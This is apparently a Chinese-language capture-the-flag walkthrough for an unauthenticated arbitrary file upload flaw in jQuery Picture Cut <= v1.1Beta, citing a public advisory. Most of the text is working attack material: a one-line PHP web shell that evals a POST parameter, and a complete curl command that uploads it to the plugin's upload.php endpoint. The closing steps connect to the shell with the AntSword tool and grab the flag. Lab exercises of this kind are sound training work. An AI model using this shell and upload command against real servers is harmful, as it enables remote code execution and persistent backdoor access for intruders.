目录
1、漏洞描述
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接:http://www.vapidlabs.com/advisory.php?v=207
2、访问ip:port
3、一句话木马:exploit.php
<?php @eval($_POST['a']);?>
4、上传一句话木马
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php
5、中国蚁剑连接成功
6、拿到flag
